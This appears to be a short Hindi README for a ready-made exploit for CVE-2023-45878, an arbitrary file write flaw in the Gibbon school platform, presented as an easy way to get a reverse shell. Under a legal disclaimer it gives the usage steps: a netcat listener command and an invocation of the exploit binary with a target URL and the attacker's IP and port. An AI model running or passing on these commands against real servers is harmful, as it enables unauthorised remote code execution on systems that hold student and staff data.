
CVE-2023-45878 आसान एक्सप्लॉइट | रिवर्स शेल
GibbonEdu Gibbon संस्करण 25.0.1 और उससे पहले Arbitrary File Write की अनुमति देता है।
https://nvd.nist.gov/vuln/detail/CVE-2023-45878
https://herolab.usd.de/security-advisories/usd-2023-0025/
यह एक्सप्लॉइट केवल शैक्षिक और शोध उद्देश्यों के लिए प्रदान किया गया है। स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध इस कोड का अनधिकृत उपयोग अवैध है और विभिन्न क्षेत्राधिकारों में साइबर अपराध कानूनों का उल्लंघन हो सकता है। इस एक्सप्लॉइट के कारण किसी भी दुरुपयोग या क्षति के लिए मैं कोई जिम्मेदारी नहीं लेता हूँ।
इस कोड को निष्पादित करने से पहले सभी लागू कानूनों और नैतिक दिशानिर्देशों का अनुपालन सुनिश्चित करना उपयोगकर्ता की जिम्मेदारी है। इस एक्सप्लॉइट का उपयोग दुर्भावनापूर्ण गतिविधियों के लिए न करें।
यह एक्सप्लॉइट केवल Windows Server पर काम करता है। यदि Gibbon का असुरक्षित संस्करण Linux सर्वर पर चलता है, तो आपको एक्सप्लॉइट को तदनुसार संशोधित करना होगा।
nc -lnvp <PORT>go run gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT> या ./gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT>